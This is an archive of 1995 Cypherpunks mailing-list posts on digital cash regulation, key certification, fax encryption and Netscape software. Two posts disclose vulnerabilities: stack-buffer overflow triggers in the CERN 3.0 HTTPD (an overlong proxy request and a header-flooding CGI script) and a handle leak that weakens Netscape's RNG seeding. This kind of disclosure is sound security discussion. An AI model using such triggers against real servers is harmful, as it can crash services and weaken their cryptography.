I'd have thought the way to do it would be for the bank to link the
currency directly to a physical currency, US$ say, and to keep the
interest on the c$ currency in circulation, as profits.  Maybe not the
way to make the most money, but then that's the advantage the civilian
sector has over big banks :-) 100% real-currency backed, so that it
would be impossible to have a run on the bank.  Also a nice way to run
it, as there are no apparent charges for using the cash, or licensing
clients (aka you hand out clients willy nilly for free, like the
netscape model which seems to work so well).

I'm serious, and would want to invest in it.

So what say?  1st digicash bank, *run*, and owned by a group of
cypherpunks?

Adam
- --
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMHa4dynIuJ1VakpnAQHaTwQAkgxtQKc1gzTmN8+bZGRk4sgB1pkGBLlh
HJqgE8VqLLmkWy5LufLsvZt0GybylyEqt1fNxK7P0FPpJ6S5+n8F+I43t3U3RpJe
yQAJdKbQtmKzdEWsoogYQRo4b6ZxJG2o6O0I3u+oBC/TVco5WypHlO40ge59MI/f
BSGh9R2mQQA=
=pdta
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Sat, 7 Oct 95 15:58:30 PDT
To: "Jim Grubs (W8GRT)" <jgrubs@webcasters.com>
Subject: Re: Kerserver keyrings
Message-ID: <199510072256.SAA19213@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


Because this problem is occurring more and more often (and only from people
on Cypherpunks), I'm cc'ing the list in general this time... please adjust
your mailers if possible:

At 12:41 1995.10.07 -0500, Jim Grubs (W8GRT) wrote:
>-- [ From: Jim Grubs (W8GRT) * EMC.Ver #2.5.02 ] --
> Attachment: mailsig Code: 0006727      \ Created: 10-03-95, 07:16 PM [1 Kb]
>
>Someone at Uni-Hamburg must have seen my message and said, "Oops, who turned
>that off?" Anyway, their keyring was upated today. It's 6.4 megs!!!! (My
>first HD was only 10.)
>
>Attachment Converted: E:\WINAPPS\INTERNET\EUDORA\mailsig

Your .sig comes through as an attachment (for Eudora users).  Could you
please fix this?  Thanks.

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 7 Oct 95 17:29:04 PDT
To: cypherpunks@toad.com
Subject: Noise: anyone experience with brain waves input devices (IBVA,...)
Message-ID: <199510080030.UAA08506@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We've sent the full version of the article below to Laurent.  
Anybody else want it, send a MIN_wav.

----------

   [Excerpts]

   Financial Times, September 27, 1995

   When it's all in the mind


   At the department of medical informatics at Graz
   University of Technology in Austria, Gert Pfurtscheller is
   working on a project that could result in
   thought-controlled devices.

   Stephen Roberts, a researcher at the electrical and
   electronics engineering department at Imperial College
   London, has worked with Pfurtscheller's team. He hopes to
   improve the signal classification accuracy by using
   artificial neural networks, computer-based systems designed
   to mimic the way the human brain works.

   Roberts's work is part of an EU research programme called
   Anndee (Artificial Neural Networks for Diagnosis and
   Enhancement of EEG) which involves around 30 researchers in
   a dozen European universities.

   The Consciousness Research laboratory at the University of
   Nevada is pursing a more controversial line of research
   into psychic phenomena or, as its director, Dean Radin,
   prefers to call it, Direct Man/Machine Interaction (DMMI).
   A number of Japanese companies including NEC and
   Matsushita, have also conducted research into DMMI. Radin
   believes that in 20 to 50 years' time, it will be possible
   to use DMMI to operate devices.

   The technology company The Other 90 Per Cent, based in
   Sausalito, California, has developed MindDrive, a computer
   games system whose programs are controlled by thought.

   MindDrive is designed to work with most IBM-compatible
   personal computers. A console, which analyses the user's
   brain waves, plugs into the back of the computer. Users
   wear a sensor sleeve over their index finger. At present,
   the system can only be used to move a cursor up and down.
   MindDrive will be on sale in the US early next year. The
   console will cost between $100 (65 pounds) to $200, and
   MindDrive games some of which will enable users to create
   music or draw on a computer screen by thought, will cost
   around $30 to $40 each.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sat, 7 Oct 95 05:28:07 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: CancelMoose = William Nagengast?
In-Reply-To: <ac9b4284310210042b5f@[205.199.118.202]>
Message-ID: <199510071051.AA37781@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>>However, after a little further investigation, I don't think it really
>>is Mr. Nagengast. It actually appears that panix.com is running a
>>little remailer. As Dave Winer would say, cooooool.
>>You're right. My sincerest apologies.

>Well, presuming that the two anonymous parties are the same, I'm impressed
>that Anonymous was fairly graceful in his comments here.
>Too bad we don't who she or he is.

#define paranoia on

Just ask your local TLA that has traffic monitors on the up and down links of
all the remailers so they can track a piece of email from sender to recipient.
They will take the (relatively small) logs of the hour and pump out a name
for you.

#define paranoia off

:)
Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 7 Oct 95 22:15:50 PDT
To: cypherpunks@toad.com
Subject: Re: MITM attacks and True Names (again...)
Message-ID: <199510080515.WAA13191@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:02 PM 10/6/95 -0600, bryce@colorado.edu wrote:
>(As an aside I fully sympathize with those who rail against the popular
>(?) impression that a True Name is somehow necessary to communication.
>That is a dangerous idea, since all a True Name is really necessary for
>is violence.  (And, pending certain eagerly-awaited technological
>developments, for sex.))

That's incorrect - it can also be necessary for _avoiding_ violence.
You don't need a full True Name for that, but you do need an accurate
partition of the namespace into those entities who will, won't, or might
come and beat you up based on what you say.  Thus, if you're talking to
Subcommandante Marcos about your plans for overthrowing the governor,
you don't need to know his True Name, but you do need to know if he's a cop;
anybody doing a successful MITM job on your data communications probably is.

Similarly, if you're in the pharmaceutical retail business and talking to
your wholesaler, you may even want to avoid knowing his True Name, but you
not only want to know if he's a cop, but you may want to know whether,
if you show up at the appointed physical location with your physical body,
you'll be met by just him (with his merchandise), or by other people as well
(eavesdroppers using MITM because it's easier than cracking crypto),
or by one of his or your competitors trying to rip you off.
(You'd also like to know if you'll be met by him without his merchandise,
but with his big ugly friends, which is why you plan to meet him in a 
public place...)




-----BEGIN PGP SIGNATURE-----
Version: 2.7.1
Comment: PGP available outside U.S.A. at ftp.ox.ac.uk

iQBVAwUBMHdVcPthU5e7emAFAQHRNwH9ErIcbgioSJOD5270SJ2hRfycNd6sMAj3
Q5jzguJVkbmsrI9I85eB/caV9UOOkSTX29v3gTAHWbeNuAL9t/Yyrw==
=3qir
-----END PGP SIGNATURE-----
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Smart <smart@mel.dit.csiro.au>
Date: Sat, 7 Oct 95 05:23:45 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510060440.VAA23299@jobe.shell.portal.com>
Message-ID: <199510071223.AA14467@shark.mel.dit.csiro.au>
MIME-Version: 1.0
Content-Type: text/plain


The key-centric scheme is not inconsistent with the use of names. Universal
names are useful in directories and private names are useful ways for
individuals to name public keys that are important. The key-centric view 
is not name-free. The difference is just this: Are attributes attached 
to keys or names?

In any public key system, however long your certificate chain at the
end of that chain there has to be a public key you trust. It can't be
a name it has to be a key. So even the most name-centric system has
a key-centric core. 

 > >1. We go through some process, let's call it Process A, where we determine
 > >   that we want to talk to IP address 192.9.8.7.
 > 
 > This would be, say, a DNS lookup on www.egghead.com.

That picks a process where there is no significant difference. But 
consider another common case. We are running a server that accepts
connections from anyone. We get a connect packet from 192.9.8.7. So
that is how we determine that we want to talk to 192.9.8.7: in order
to serve it.

In the standard view we now do a reverse lookup to get a name then
go to the DNS again to get the public key associated with that name.
And yet we don't care who we are talking to, and we don't need or
want to have to work out whether we trust the certificate. There was 
no reason why we couldn't have just had a secure conversation without 
ever doing any directory lookups.

I have seen it asserted that we would never want to have a secure 
conversation with someone when we don't know who they are. I strongly 
disagree with that. Suppose in our example that our server sells 
alcohol in exchange for digital cash:

 a. We want the sequence of packets from our purchaser to be authenticated.
    We don't want some humourist doubling the order or otherwise
    corrupting it.

 b. The purchaser is entitled to a private (encrypted) conversation.
    For example maybe he is Islamic and doesn't want to his religious
    bretheren on his ethernet to know about his alcohol purchases.

Now another aspect is that you need to be over 18 to buy alcohol
[in Australia]. So the purchaser has to present a certificate signed
by the appropriate authority saying that the owner of the public key
is over 18. But note that in the key-centric world the liquor seller
doesn't have to know who the purchaser is. The certificate that says
you are over 18 is a separate thing, not mixed up in an X.509 v3
certificate that also has your name, address and sexual preference.

So a question: you are the liquor seller. How do you want the information
about the "appropriate authority" that signs those "over 18" certificates? 
Do you want a name that can give you an X.509 certificate and a certificate 
chain from a directory service? Or do you think you should get hold of the
public key yourself in some way that gives you real confidence?

Bob Smart




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 7 Oct 95 22:24:46 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunks digicash bank?
Message-ID: <v02120d02ac9d1e825159@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I strongly recommend that anyone considering licensing from Chaum
first read my paper on some interesting aspects of his basic blinding
patent. The paper is at: http://www.communities.com/paper/agnostic.html.

I will be putting up another short paper on anonymous currency
management within the next few days.

Also, I strongly recommend that anyone serious about this not use the
word "bank", and take the time to figure out how to structure the
service as an NBFI (non-banking financial institution) and not a "bank".
Note that NBFIs are still regulated, and you will, at minimum, need to
consult with your state banking regulators as well as the IRS (who
also regulate money transmitters, i.e. issuers of traveller's checks,
moneygrams, etc.) Note that the BSA (Bank _non_ Secrecy Act) does in fact
apply to NBFIs and money transmitters, and you should be sure to educate
yourself as to the implications of this.

I will be covering some aspects of these issues at length in my trip
report on the anti-money-laundering conference I recently attended,
which was a real eye-opener in a number of ways.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 8 Oct 95 00:18:06 PDT
To: privsoft@ix.netcom.com (Steve )
Subject: Re: Graphic encryption
Message-ID: <199510080717.AAA02124@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:17 AM 10/6/95 -0700, privsoft@ix.netcom.com (Steve ) wrote:
>Also if any of ya'll are famillar with graphic encryption, I am looking 
>for opinions as to its strengths / weaknesses.

While normally I'd agree with Lucky Green and say that a good encryption
algorithm's strength is independent of its input data, there are exceptions.

The description of Privasoft's method on their web page sounded like* it
broke up a fax image into little squares and shuffled them around based on
some proprietary (hence presumably weak) algorithm, somewhat like feeding
them to a shredder or puzzle-box, then put them in a file you can ship
with regular fax software or decrypt yourself.  If that's the case,
and if the squares are sufficiently big to have enough pixels for fax
software to compress decently, then it's weak no matter _how_ strong
the encryption algorithm that shuffles them is, because you can piece together
matching edges like a jigsaw puzzle, or like a bunch of Iranian students
with American Embassy shredded documents.  Using computers is a lot easier,
since you've got precise images of print - most edges will match pretty well
with the edges of the adjacent squares, and you can jigsaw the parts that
still need work if you get too many multiple matches.  

A much stronger way to encrypt faxes is to do the Group 3 (or G4) compression
first, then encrypt using a real algorithm, ship the (now-useless-for-fax)
encrypted bits, decrypt, and read with your favorite fax-image viewer.
Or, of course, take the raw file you would have done this with, which is much
smaller than the fax-compressed image, encrypt it, ship, decrypt, and view,
but that means the person on the far end needs the same word-processor.


-------
* The software was on the web page; if I'd had spare disk space that day and
some slack time I could have downloaded the demo version and tried it,
but this is what the description sounded like it meant.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 8 Oct 95 00:18:17 PDT
To: cypherpunks@toad.com
Subject: Certification Authorities in history.
Message-ID: <199510080718.AAA02155@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May (or somebody like him, or Tim the Enchanted) wrote:
>> The talk of certification authorities is OK, so long as the practice is
>> _completely_  and "strongly" voluntary (*).

It occurred to me that the authors of the US Constitution had 
direct experience with the equivalent of mandatory certification hierarchies
for legally acceptable digital signatures.

They called it "The Stamp Act".  

If you wanted to make a legal document, such as a contract or will, 
it needed to be on paper with a tax stamp on it; I forget if this was
a watermark or a stick-on stamp, but you could only get it from the authorities.

They didn't like it.  There was also a few-percent sales tax on tea around
that time.  They didn't like that either :-)


--------
</serious_mode>
<Don_Hopkins_Monty_Python_Voice> 
<i> WHAT </i> is your name?
<i> WHAT </i> is your certificate number?
</Don_Hopkins_Monty_Python_Voice> 
<serious_mode>
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 7 Oct 95 16:30:57 PDT
To: Herb Sutter <herbs@interlog.com>
Subject: NOISE eudora [was Re: Kerserver keyrings]
In-Reply-To: <199510072256.SAA19213@gold.interlog.com>
Message-ID: <9510072330.AA01830@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



begin 644 eudora_sucks
because eudora is lame or ill configured is not a reason to
pollute the list...
ps1: yes the first poster binary .sig was a ill too
ps2: yes I'm polluting too but those "mailer wars" are getting boring
ps3: I wonder if this message crashes eudora ;-) ! \/~!`
`
end

--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Kennedy Serbian PGP Qaddafi Kaser Sose arrangements break




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 7 Oct 95 17:06:31 PDT
To: cypherpunks@toad.com
Subject: Noise: anyone experience with brain waves input devices (IBVA,...)
Message-ID: <9510080007.AA01951@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



I'd like to know if anyone have first hand experience with brain wave
and other (hyped) input devices like IBVA or others and/or pointers to
informations ?

sorry for the little relevance to crypto, but I expect the share
of geeks and nerds on the list to increase my chance to get an answer :-)
{
 the military folks are welcome to answer too... i will receive
 anonymously posted classified documents on the subject with pleasure :-)
 and reference to published work too [plane's brain interfaces,...]
}

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Clinton [Hello to all my fans in domestic surveillance] NSA Kaser Sose
Treasury FBI Marxist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Sun, 8 Oct 95 01:39:18 PDT
To: cypherpunks@toad.com
Subject: Re: NEW Netscape RNG hole
In-Reply-To: <9510080732.AA14015@anon.penet.fi>
Message-ID: <30778E3D.4CBD@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


RingZero wrote:
> 
> Did anyone else notice a bug in the new, public Netscape
> RNG code? It appears that on Windows builds, during the
> RNG seeding, the function that hashes in file contents
> (EnumSystemFiles) doesn't close a file handle (lFileHandle).

I think you mean lFindHandle. I'm not a windows programmer, so I have
no idea if the enumerator needs to be cleaned up, but I will forward
your message to the appropriate folks here.

> This doesn't hurt too badly on the client, but on a server,
> leaking these resources is deadly.

Not really. SEC_SystemInfoForRNG is called ONCE for each execution.
This is true for servers and for clients. Did you rig up a test
bed that called SEC_SystemInfoForRNG in a loop? In addition, if
the server cannot open any more files, it will have difficulty
delivering any information (compromised or not) to any clients.

The clients use the SEC_GetNoise data each time they go idle to
re-initialize the PRNG seed. The servers also re-initialize the
PRNG seed periodically. That function does not use any file
handles.

> I ran some experiments. It took a few thousand calls before
> these open file handles forced not only the file content function
> to fail, but also made OTHER calls quietly fail. With these calls
> quietly failing, the RNG is significantly weakened. In my tests
> on Windows NT, ALL of the following RNG functions failed:
> 
> * GetComputerName
> * GetVolumeInformation
>         volume Name,
>         volume Serial Number,
>         Maximum Filename Length
>         Filesystem Flags
>         Filesystem Name
> * GetDiskFreeSpace
>         SectorsPerCluster
>         BytesPerSector
>         Free Clusters
>         Total Clusters
> * subroutine for the inclusion of system files, both number of them & 
contents
>         ReadSystemFiles()
> * subroutine used for other history file accesses
>         SEC_FileForRNG(*filename)

SEC_FileForRNG does close every file it opens. As I said before,
I don't know what the rules are for closing the enumerators.
 
> How did this get past Netscape testers?

The tested servers worked? :-)

> Does anyone
> know if this was fixed before Netscape shipped?

The code that was made available for download was the same that
was in the shipped updates.

> Does
> it rate a shirt, or does this mean  Jeff W. gets to shave his
> head? I seem to remember him promising to shave it if we
> could show a significant weakness in the new RNG code,
> and since this does (IMO)...

That was me (Phil Karlton) and not Jeff who put his locks (pun intended)
at risk. You haven't demonstrated to me that there is significant
weakness. I'll keep my hair for another day.

I don't think you are going to get a shirt. It's hard to mail one
to an anonymous person. On the other hand, they are not mine to
give or withhold.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sat, 7 Oct 95 22:53:45 PDT
To: cypherpunks@toad.com
Subject: Two bugs in CERN3.0 HTTPD
Message-ID: <199510080553.BAA29494@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



I have not verified whether or not both of these are security holes yet, 
but the first one is very probably a security hole.


1) overlong domain bug in Proxy mode
Symptom: send a proxy request to the server, for instance
GET http://overlongdomain HTTP/1.0

  This is the same bug that's in Netscape 1.1. The domain buffer
is a 256 byte buffer declared on the stack. (char host[256])

2) too many headers from CGI script
Symptom: HTScript.c allocates an array of pointers to char on the stack. This
array has size 100. The loop where they parse the output of a CGI script
is not bounds checked.  To crash the server, create a CGI script that
outputs a large number of headers before the document body.
(I simply made a perl script that did for($i=0; $i<1000; $i++) { 
  print "Header$i: $i\n") Although this bug can coredump the process
servicing the request, I doubt it is exploitable. All that happens is 
an unchecked header_line[header_index++]=malloc(some space) gets executed.
In the worst case, you overwrite the stack with excessive malloc pointers.
You may be able to cause a foreign server to crash by having your own fake
server return the exploit, and then getting the foreign server to
read the headers by issuing a proxy request to your server.

Suffice it to say, the CERN code is *littered* with temporary local
stack arrays, and I'm guessing that many of them have faulty bounds
checking (or none at all)

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ogre@brainlink.com (Ron Hansen)
Date: Sat, 7 Oct 95 19:21:32 PDT
To: cypherpunks@toad.com
Subject: VCRplus code Algorithm
Message-ID: <199510080223.WAA13966@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been trying (without success) to crack the encryption scheme that
Gemstar uses in its' VCRplus codes.  I have written a TV/cable show
management system that generates plus codes for half-hour boundary shows
(ie 4 to 6 digit codes).  I can't seem to find anything on 7 and 8 digit
codes which handle 5 minute increments for program start time and
length.

(And yes, I have the article "Decoding a VCR Controller Code" by Ken
Shirriff, Curt Welch and Andrew Kinsman.  It was published in
Cryptologia.  Unfortunately, they didn't get beyond 6 digits either.)

BTW, this is strictly for my own use.  I'm just tired of approximating
shows and also a bug that I have that occasionally gives incorrect
results (I think it may be a leading zero being trimmed by the math
formulas).

Can anyone help?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Purshottam <andy@acgeas.com>
Date: Sun, 8 Oct 95 02:36:19 PDT
To: cypherpunks@toad.com
Subject: netscape mail starts java attachments upon get new mail...
Message-ID: <199510080937.CAA17576@bibimbap.acgeas.com>
MIME-Version: 1.0
Content-Type: text/plain


The new netscape mail reader is quite nice, but a little too
automatic for my tastes. If one mails a java applet as an
attachment, doing "Get New Mail" with the mailed document
as the next message, automatically starts the applet in your mail
display. Of course, the wonderful Java security mechanism is
protecting you. 

Otherwise the java mail stuff is quite reasonable. I predict
it gains wide acceptance. 

Andy (andy@acgeas.com)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy <andy@acgeas.com>
Date: Sun, 8 Oct 95 02:39:27 PDT
To: cypherpunks@toad.com
Subject: Image Tape - view with Java enhanced Netscape mail reader
Message-ID: <30779C9D.3BA3@acgeas.com>
MIME-Version: 1.0
Content-Type: text/plain

http://www.javasoft.com/JDK-prebeta1/applets/ScrollingImages/example1.html

Title: Image Tape











The source.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 8 Oct 95 01:51:13 PDT
To: cypherpunks@toad.com
Subject: Netscape 2.0 beta
Message-ID: <199510080851.EAA13995@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



 Well, it's not mentioned on their home page yet, but I went to their ftp
site and I found that Netscape 2.0 beta was up there. For those wishing
to get their hands on Java, they don't support Java on the Mac or 
Linux/NetBSD/BSDI platforms yet. Only Win95/NT, IRIX, and Solaris/SunoS
are supported for Java. I knew it was too good to be true for them to have
ported Java to so many platforms so quickly.

  The good news is that someone finally, after years, has implemented
Progressive JPEG (I've been yelling about it for a while myself), and 
it is simply *light years* better than interlaced GIFs. 

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an402976@anon.penet.fi (RingZero)
Date: Sun, 8 Oct 95 00:47:25 PDT
To: cypherpunks@toad.com
Subject: NEW Netscape RNG hole
Message-ID: <9510080732.AA14015@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Did anyone else notice a bug in the new, public Netscape
RNG code? It appears that on Windows builds, during the
RNG seeding, the function that hashes in file contents
(EnumSystemFiles) doesn't close a file handle (lFileHandle).
This doesn't hurt too badly on the client, but on a server,
leaking these resources is deadly.

I ran some experiments. It took a few thousand calls before
these open file handles forced not only the file content function
to fail, but also made OTHER calls quietly fail. With these calls
quietly failing, the RNG is significantly weakened. In my tests
on Windows NT, ALL of the following RNG functions failed:

* GetComputerName
* GetVolumeInformation
	volume Name,
	volume Serial Number,
	Maximum Filename Length
	Filesystem Flags
	Filesystem Name
* GetDiskFreeSpace
	SectorsPerCluster
	BytesPerSector
	Free Clusters
	Total Clusters
* subroutine for the inclusion of system files, both number of them & contents
	ReadSystemFiles()
* subroutine used for other history file accesses
	SEC_FileForRNG(*filename)

How did this get past Netscape testers? Does anyone
know if this was fixed before Netscape shipped? Does
it rate a shirt, or does this mean  Jeff W. gets to shave his
head? I seem to remember him promising to shave it if we
could show a significant weakness in the new RNG code,
and since this does (IMO)...


On another note, has anyone noticed the 73 (!!!) or so
handles that are leaked by simply opening and closing
&Options -> &Preferences... ? Looks like somebody had a
problem coding the tabbed dialog.


RingZero

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 8 Oct 95 08:44:04 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: cypherpunks digicash bank?
Message-ID: <v02120d00ac9daa196797@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Adam --

I'm afraid you may have somewhat misunderstood the motivation
behind the Identity Agnostic paper. In no way is it intended as
a way of not facing the music wrt regulators in the country(s) where
such an institution has offices. The IA approach is intended as
an possible alternative for an institution that might otherwise
license from Chaum.

The regulators I've discussed this with are primarily concerned
with how money moves into and out of a digital cash system. The
fact that small payments cannot be traced from buyer to seller is
not at the top of their list of concerns -- it's already a basic
fact of life for them in existing payment systems. They are also
not oblivious to the privacy concerns inherent in an institution
logging masssive amounts of counterparty data about small transactions.

I would strongly discourage anyone from trying to set up a garage-
type operation. While regulators clearly don't appreciate the
subtleties of this stuff, they can spot an illegal bank or an
unlicensed money transmitter from a mile away.

If your concern is creating account anonymity, then you're going
to need to set up outside of the US. Do be aware that even the more
relaxed countries of the world have regulations that cover this
sort of thing, and they are especially interested in making sure
you at least pay the appropriate licensing fees.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 8 Oct 95 06:07:58 PDT
To: cypherpunks@toad.com
Subject: FOR_who
Message-ID: <199510081307.JAA23047@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-8-95. NYPaper:


   "Foreign Policy 3.1. Microsoft as World Power." [Foreign
   affairs column]

      Does Microsoft have a foreign policy? Mr. Ballmer says
      Microsoft doesn't have a foreign policy per se. But it
      does have a global business agenda. Since Microsoft
      today has twice the market value of General Motors, it's
      worth looking at that agenda because it is bound to
      influence U.S. foreign policy. Microsoft doesn't need
      Washington to open doors for it because foreign
      governments are begging Microsoft to come in and
      translate Windows 95 into their languages, so they can
      get on the information highway. Describing his contacts
      with foreign leaders, Mr. Ballmer put it this way:
      "People say, 'You have this technology. We hear it's
      changing the world. Tell us how it can help us.' "


   10-7-95. The Econofog:

   "The myth of the powerless state." [lead for a superb 40-
   page survey of the world economy]

      The increasing "globalisation" of the world economy is
      a fact, and one that nobody can ignore. To many,
      however, one aspect of this change is especially
      important: its effect on "economic sovereignty". They
      claim that global integration is emasculating the modern
      state. If the number of believers is any guide, these
      views are appealing. Yet the new orthodoxy is wrong. The
      world has changed, the global economy has indeed
      arrived: nonetheless, the emasculated state is a myth.


   Micro and Macro: FOR_who  (19 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 8 Oct 95 10:23:23 PDT
To: cypherpunks@toad.com
Subject: Re: MITM attacks and True Names (again...)
In-Reply-To: <199510080515.WAA13191@ix5.ix.netcom.com>
Message-ID: <199510081722.KAA10011@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


One of the reasons people don't like solutions based on True Names is
because nyms don't have them.  Pr0duct Cypher can't very well go to
someone, show a drivers license, and get his key signed.

There is still a way in which signed, true-name-based keys can be useful
to nyms.  Maybe they can't get their own keys signed in this mode, but
they can check the keys of others.

If Pr0duct Cypher, under his secret identity, goes out and gets valid
keys that he can trust (maybe he sees Verisign's key fingerprint in the
newspaper), then if I send him my key signed by someone he trusts, he
can check the signature.  He can then send data to me encrypted with my
actual key, and the MITM can't do anything about it.  So the presence
of my True Name based key allows us to communicate securely.

This doesn't help for the case of two nyms who want to communicate,
though.  For that we do need a mode in which nyms can get their keys
signed.  I do think that there are some situations in which that is
plausible, based on the difficulty of mounting a MITM attack against
someone who is determined to try to detect it.  In the most extreme case
the MITM has to simulate the whole outside world with respect to the
person he is targetting, which is infeasible.  Various tricks like
sending hashes of future messages have been discussed; the MITM can't let
these through since the future message may include the true key that he
is hiding.  If people are then supposed to reply to these hashes, all of
the replies have to be simulated by the MITM.  Eventually it seems that
the MITM becomes enmeshed so deeply in his own lies that he would get
caught.  If steps like these are taken successfully it should be
reasonable to sign a nym's key, with the semantics being that either this
is the real key of the sender, or he has a nearly omnipotent MITM
surrounding him.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 8 Oct 95 10:27:46 PDT
To: cypherpunks@toad.com
Subject: Re: Certification Authorities in history.
In-Reply-To: <199510080718.AAA02155@ix5.ix.netcom.com>
Message-ID: <199510081726.KAA10621@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


One key to rule them all;
One key to find them;
One key to bring them all
And in the darkness bind them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Sun, 8 Oct 95 07:49:13 PDT
To: cypherpunks@toad.com
Subject: Boston Globe article
Message-ID: <951008104657.44605479@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



 The Boston Sunday Globe Business section has an article by Jon Auerbach
entitled Cypherpunks with a picture of Carl Ellison and one of Ian Goldberg
and David Wagner. It stresses privacy, anarchy and the fears of the FBI.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nyuan@husc.harvard.edu (Nina Yuan)
Date: Sun, 8 Oct 95 08:08:42 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks in the Boston Globe
Message-ID: <199510081508.LAA22962@fas.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Cypherpunks: In pursuit of privacy they break codes, fault government
